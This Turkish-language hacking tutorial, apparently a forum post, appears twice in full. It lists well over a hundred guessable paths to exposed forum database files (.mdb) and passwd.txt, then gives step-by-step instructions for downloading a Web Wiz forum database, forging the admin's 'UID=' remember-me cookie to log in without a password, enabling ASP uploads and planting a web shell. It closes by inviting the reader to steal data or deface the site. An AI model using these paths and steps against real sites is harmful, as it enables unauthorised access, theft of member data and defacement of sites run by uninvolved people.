Bunları sitenin sonuna teker teker ekleyin deneyin
/db/main.mdb
/tools/snitz_forums_2000.mdb
/snitz_forums_2000.mdb
/admin/database/wwforum.mdb
/db/uyelik.mdb
/passwd.txt
/uyelik.mdb
/uyeler.mdb
/login.mdb
/enter.mdb
/giris.mdb
/sifreler.mdb
/member.mdb
/members.mdb
/samples.mdb
/wwforum.mdb
/genctr.mdb
/aforum.mdb
/forum.mdb
/private.mdb
/register.mdb
/.mdb
/db/snitz_forums_2000.mdb
/db/login.mdb
/db/forum.mdb
/db/genctr.mdb
/db/aforum.mdb
/db/enter.mdb
/db/giris.mdb
/db/forum.mdb
/db/uyelik.mdb
/db/uyeler.mdb
/db/private.mdb
/db/register.mdb
/db/.mdb
/db/sifreler.mdb
/db/member.mdb
/db/members.mdb
/db/samples.mdb
/db/wwforum.mdb
/db/tools/snitz_forums_2000.mdb
/admin/member.mdb
/admin/private.mdb
/admin/register.mdb
/admin/members.mdb
/admin/uyeler.mdb
/admin/sifreler.mdb
/admin/enter.mdb
/admin/giris.mdb
/admin/register.mdb
/admin/samples.mdb
/admin/private.mdb
/admin/mdb.mdb
/admin/forum.mdb
/admin/aforum.mdb
/admin/login.mdb
/admin/.mdb
/admin/database/wwforum.mdb
/admin/database/uyeler.mdb
/admin/database/sifreler.mdb
/admin/database/login.mdb
/admin/database/member.mdb
/admin/database/members.mdb
/admin/database/private.mdb
/admin/database/enter.mdb
/admin/database/giris.mdb
/admin/database/register.mdb
/admin/database/sevgi.mdb
/admin/database/samples.mdb
/admin/database/mbd.mdb
/admin/database/forum.mdb
/admin/database/aforum.mdb
/admin/database/.mdb
/admin/db/wwforum.mdb
/admin/db/uyeler.mdb
/admin/db/sifreler.mdb
/admin/db/login.mdb
/admin/db/member.mdb
/admin/db/members.mdb
/admin/db/private.mdb
/admin/db/register.mdb
/admin/db/enter.mdb
/admin/db/giris.mdb
/admin/db/samples.mdb
/admin/db/mdb.mdb
/admin/db/forum.mdb
/admin/db/aforum.mdb
/admin/db/.mdb
/skeetx/slog/login.mdb
/forum/db/main.mdb
/forum/tools/snitz_forums_2000.mdb
/forum/snitz_forums_2000.mdb
/forum/admin/wwforum.mdb
/forum/db/uyelik.mdb
/forum/passwd.txt
/forum/uyelik.mdb
/forum/uyeler.mdb
/forum/login.mdb
/forum/enter.mdb
/forum/giris.mdb
/forum/sifreler.mdb
/forum/member.mdb
/forum/members.mdb
/forum/samples.mdb
/forum/wwforum.mdb
/forum/genctr.mdb
/forum/private.mdb
/forum/register.mdb
/forum/aforum.mdb
/forum/forum.mdb
/forum/.mdb
/forum/db/snitz_forums_2000.mdb
/forum/db/login.mdb
/forum/db/forum.mdb
/forum/db/genctr.mdb
/forum/db/aforum.mdb
/forum/db/forum.mdb
/forum/db/enter.mdb
/forum/db/giris.mdb
/forum/db/uyelik.mdb
/forum/db/uyeler.mdb
/forum/db/private.mdb
/forum/db/register.mdb
/forum/db/.mdb
/forum/db/sifreler.mdb
/forum/db/member.mdb
/forum/db/members.mdb
/forum/db/samples.mdb
/forum/db/wwforum.mdb
/forum/db/tools/snitz_forums_2000.mdb
/forum/admin/member.mdb
/forum/admin/members.mdb
/forum/admin/uyeler.mdb
/forum/admin/sifreler.mdb
/forum/admin/enter.mdb
/forum/admin/giris.mdb
/forum/admin/register.mdb
/forum/admin/samples.mdb
/forum/admin/private.mdb
/forum/admin/mdb.mdb
/forum/admin/forum.mdb
/forum/admin/aforum.mdb
/forum/admin/login.mdb
/forum/admin/.mdb
/forum/admin/database/wwforum.mdb
/forum/admin/database/uyeler.mdb
/forum/admin/database/sifreler.mdb
/forum/admin/database/login.mdb
/forum/admin/database/member.mdb
/forum/admin/database/enter.mdb
/forum/admin/database/giris.mdb
/forum/admin/database/members.mdb
/forum/admin/database/private.mdb
/forum/admin/database/register.mdb
/forum/admin/database/sevgi.mdb
/forum/admin/database/samples.mdb
/forum/admin/database/mbd.mdb
/forum/admin/database/forum.mdb
/forum/admin/database/aforum.mdb
/forum/admin/database/.mdb
/forum/admin/db/wwforum.mdb
/forum/admin/db/uyeler.mdb
/forum/admin/db/sifreler.mdb
/forum/admin/db/login.mdb
/forum/admin/db/member.mdb
/forum/admin/db/members.mdb
/forum/admin/db/enter.mdb
/forum/admin/db/giris.mdb
/forum/admin/db/private.mdb
/forum/admin/db/register.mdb
/forum/admin/db/samples.mdb
/forum/admin/db/mdb.mdb
/forum/admin/db/forum.mdb
/forum/admin/db/aforum.mdb
/forum/admin/db/.mdb
Bildiğimiz gibi webwiz veritabanlarındaki parolalar şifrelenmiş biçimdeler ve veritabanını ele geçirsek bile hiç bir anlamı kalmıyordu.. Ama bu yazıyı okuyup bitirdiğinizde bu sorunu aşıp nasıl bir sitenin hacklenebileceğini göreceksiniz.. Öncelikle Cookieeditor isimli programı download edip kuruyoruz.. Bu program çerezleri düzenliyebilmemizi sağlıyor..
Evet programı kurduktan sonra webwiz forum kullanan bir site buluyoruz... Daha sonra sitenin sonuna /admin/database/wwForum.mdb yazıyoruz. Eğer şansınız varsa veritabanını indiriyoruz..
microsoft access le açalım bunu
Daha sonra çerez düzenliyicimizden sitenin adresini yazıyoruz ve WWF adlı webwiz çerezini buluyoruz.. Evet düzenlemek için açın şöyle bir yazı olacak: LTVST=38382%2E7898032407 Bu yazıyı silip yerine veritabanındaki tblAuthor adlı tablodan adminin user_codesini alıyoruz.. User_Code beni hatırla seçeneği işaretlendiği zaman kullanıcıyı tekrar tanımak için kullanılan koddur.. Üye her giriş yaptığı zaman bu kod otomatik olarak güncellenir ve belirli bir algoritması yoktur . Bu yüzden her forum kullanan sitede işe yaramaz.. Neyse devam edelim adminin user codesini kopyalayın ve yapıştırmadan önce UID= yazıp kopyalayın yoksa işe yaramaz.. Son durum olarak şöyle bir yazı olmalı: UID=admin8643E28649 .. Evet her şey güzel yalnız webwiz penceresi acıksa kapatın.. Sonra tekrar dan aynı adresi girip siteye bağlanın eğer hiçbir hata yapmadıysanız foruma admin olarak giriş yapmış olacaksınız.. Şifreyi bilmeden bağlandınız bu harika ... Evet admin olarak bağlandıysanız yukarıda Yönetici Bölümü / Admin yazısı çıkması lazım.. Evet çıkdıysa tıklayıp yönetici bölümüne geçiş yapın.. Evet solda general admin diye bir yer var .. Oraya geçip file and image... diye bir yazı var ona basıp upload etmeyi etkinleştirin yalnız orda dosya türlerine asp eklemeyide unutmayın.. Aktif hale getirdikten sonra my profile bölümüne gidin.. Orda simgenin altında simge yükle var. Oraya basıp elmalı şekerinizi rahatça upload edebilirsiniz. Upload ettikten sonra elmalı şekerimi nasıl bulacam diyorsanız %90 uploads adlı klasordedir. Eğer degilse profildeki gözükmeyen resimin adresine bakın o yükledigimiz dosya .. Ondan sonra site sizin. İster bilgi calın ister index atın ...
/db/main.mdb
/tools/snitz_forums_2000.mdb
/snitz_forums_2000.mdb
/admin/database/wwforum.mdb
/db/uyelik.mdb
/passwd.txt
/uyelik.mdb
/uyeler.mdb
/login.mdb
/enter.mdb
/giris.mdb
/sifreler.mdb
/member.mdb
/members.mdb
/samples.mdb
/wwforum.mdb
/genctr.mdb
/aforum.mdb
/forum.mdb
/private.mdb
/register.mdb
/.mdb
/db/snitz_forums_2000.mdb
/db/login.mdb
/db/forum.mdb
/db/genctr.mdb
/db/aforum.mdb
/db/enter.mdb
/db/giris.mdb
/db/forum.mdb
/db/uyelik.mdb
/db/uyeler.mdb
/db/private.mdb
/db/register.mdb
/db/.mdb
/db/sifreler.mdb
/db/member.mdb
/db/members.mdb
/db/samples.mdb
/db/wwforum.mdb
/db/tools/snitz_forums_2000.mdb
/admin/member.mdb
/admin/private.mdb
/admin/register.mdb
/admin/members.mdb
/admin/uyeler.mdb
/admin/sifreler.mdb
/admin/enter.mdb
/admin/giris.mdb
/admin/register.mdb
/admin/samples.mdb
/admin/private.mdb
/admin/mdb.mdb
/admin/forum.mdb
/admin/aforum.mdb
/admin/login.mdb
/admin/.mdb
/admin/database/wwforum.mdb
/admin/database/uyeler.mdb
/admin/database/sifreler.mdb
/admin/database/login.mdb
/admin/database/member.mdb
/admin/database/members.mdb
/admin/database/private.mdb
/admin/database/enter.mdb
/admin/database/giris.mdb
/admin/database/register.mdb
/admin/database/sevgi.mdb
/admin/database/samples.mdb
/admin/database/mbd.mdb
/admin/database/forum.mdb
/admin/database/aforum.mdb
/admin/database/.mdb
/admin/db/wwforum.mdb
/admin/db/uyeler.mdb
/admin/db/sifreler.mdb
/admin/db/login.mdb
/admin/db/member.mdb
/admin/db/members.mdb
/admin/db/private.mdb
/admin/db/register.mdb
/admin/db/enter.mdb
/admin/db/giris.mdb
/admin/db/samples.mdb
/admin/db/mdb.mdb
/admin/db/forum.mdb
/admin/db/aforum.mdb
/admin/db/.mdb
/skeetx/slog/login.mdb
/forum/db/main.mdb
/forum/tools/snitz_forums_2000.mdb
/forum/snitz_forums_2000.mdb
/forum/admin/wwforum.mdb
/forum/db/uyelik.mdb
/forum/passwd.txt
/forum/uyelik.mdb
/forum/uyeler.mdb
/forum/login.mdb
/forum/enter.mdb
/forum/giris.mdb
/forum/sifreler.mdb
/forum/member.mdb
/forum/members.mdb
/forum/samples.mdb
/forum/wwforum.mdb
/forum/genctr.mdb
/forum/private.mdb
/forum/register.mdb
/forum/aforum.mdb
/forum/forum.mdb
/forum/.mdb
/forum/db/snitz_forums_2000.mdb
/forum/db/login.mdb
/forum/db/forum.mdb
/forum/db/genctr.mdb
/forum/db/aforum.mdb
/forum/db/forum.mdb
/forum/db/enter.mdb
/forum/db/giris.mdb
/forum/db/uyelik.mdb
/forum/db/uyeler.mdb
/forum/db/private.mdb
/forum/db/register.mdb
/forum/db/.mdb
/forum/db/sifreler.mdb
/forum/db/member.mdb
/forum/db/members.mdb
/forum/db/samples.mdb
/forum/db/wwforum.mdb
/forum/db/tools/snitz_forums_2000.mdb
/forum/admin/member.mdb
/forum/admin/members.mdb
/forum/admin/uyeler.mdb
/forum/admin/sifreler.mdb
/forum/admin/enter.mdb
/forum/admin/giris.mdb
/forum/admin/register.mdb
/forum/admin/samples.mdb
/forum/admin/private.mdb
/forum/admin/mdb.mdb
/forum/admin/forum.mdb
/forum/admin/aforum.mdb
/forum/admin/login.mdb
/forum/admin/.mdb
/forum/admin/database/wwforum.mdb
/forum/admin/database/uyeler.mdb
/forum/admin/database/sifreler.mdb
/forum/admin/database/login.mdb
/forum/admin/database/member.mdb
/forum/admin/database/enter.mdb
/forum/admin/database/giris.mdb
/forum/admin/database/members.mdb
/forum/admin/database/private.mdb
/forum/admin/database/register.mdb
/forum/admin/database/sevgi.mdb
/forum/admin/database/samples.mdb
/forum/admin/database/mbd.mdb
/forum/admin/database/forum.mdb
/forum/admin/database/aforum.mdb
/forum/admin/database/.mdb
/forum/admin/db/wwforum.mdb
/forum/admin/db/uyeler.mdb
/forum/admin/db/sifreler.mdb
/forum/admin/db/login.mdb
/forum/admin/db/member.mdb
/forum/admin/db/members.mdb
/forum/admin/db/enter.mdb
/forum/admin/db/giris.mdb
/forum/admin/db/private.mdb
/forum/admin/db/register.mdb
/forum/admin/db/samples.mdb
/forum/admin/db/mdb.mdb
/forum/admin/db/forum.mdb
/forum/admin/db/aforum.mdb
/forum/admin/db/.mdb
Bildiğimiz gibi webwiz veritabanlarındaki parolalar şifrelenmiş biçimdeler ve veritabanını ele geçirsek bile hiç bir anlamı kalmıyordu.. Ama bu yazıyı okuyup bitirdiğinizde bu sorunu aşıp nasıl bir sitenin hacklenebileceğini göreceksiniz.. Öncelikle Cookieeditor isimli programı download edip kuruyoruz.. Bu program çerezleri düzenliyebilmemizi sağlıyor..
Evet programı kurduktan sonra webwiz forum kullanan bir site buluyoruz... Daha sonra sitenin sonuna /admin/database/wwForum.mdb yazıyoruz. Eğer şansınız varsa veritabanını indiriyoruz..
microsoft access le açalım bunu
Daha sonra çerez düzenliyicimizden sitenin adresini yazıyoruz ve WWF adlı webwiz çerezini buluyoruz.. Evet düzenlemek için açın şöyle bir yazı olacak: LTVST=38382%2E7898032407 Bu yazıyı silip yerine veritabanındaki tblAuthor adlı tablodan adminin user_codesini alıyoruz.. User_Code beni hatırla seçeneği işaretlendiği zaman kullanıcıyı tekrar tanımak için kullanılan koddur.. Üye her giriş yaptığı zaman bu kod otomatik olarak güncellenir ve belirli bir algoritması yoktur . Bu yüzden her forum kullanan sitede işe yaramaz.. Neyse devam edelim adminin user codesini kopyalayın ve yapıştırmadan önce UID= yazıp kopyalayın yoksa işe yaramaz.. Son durum olarak şöyle bir yazı olmalı: UID=admin8643E28649 .. Evet her şey güzel yalnız webwiz penceresi acıksa kapatın.. Sonra tekrar dan aynı adresi girip siteye bağlanın eğer hiçbir hata yapmadıysanız foruma admin olarak giriş yapmış olacaksınız.. Şifreyi bilmeden bağlandınız bu harika ... Evet admin olarak bağlandıysanız yukarıda Yönetici Bölümü / Admin yazısı çıkması lazım.. Evet çıkdıysa tıklayıp yönetici bölümüne geçiş yapın.. Evet solda general admin diye bir yer var .. Oraya geçip file and image... diye bir yazı var ona basıp upload etmeyi etkinleştirin yalnız orda dosya türlerine asp eklemeyide unutmayın.. Aktif hale getirdikten sonra my profile bölümüne gidin.. Orda simgenin altında simge yükle var. Oraya basıp elmalı şekerinizi rahatça upload edebilirsiniz. Upload ettikten sonra elmalı şekerimi nasıl bulacam diyorsanız %90 uploads adlı klasordedir. Eğer degilse profildeki gözükmeyen resimin adresine bakın o yükledigimiz dosya .. Ondan sonra site sizin. İster bilgi calın ister index atın ...
